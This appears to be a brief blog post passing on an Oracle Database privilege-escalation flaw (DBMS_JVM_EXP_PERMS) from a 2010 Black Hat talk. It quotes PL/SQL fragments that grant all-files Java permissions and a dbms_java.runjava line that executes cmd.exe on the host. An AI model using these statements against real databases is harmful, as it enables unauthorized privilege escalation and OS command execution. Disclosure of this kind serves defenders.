David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:
Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
FETCH C1 BULK COLLECT INTO POL;
Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).
However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:
select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\windows\system32\cmd.exe /c dir>c:\out.lst’)from dual;
Here is the link of the talk video: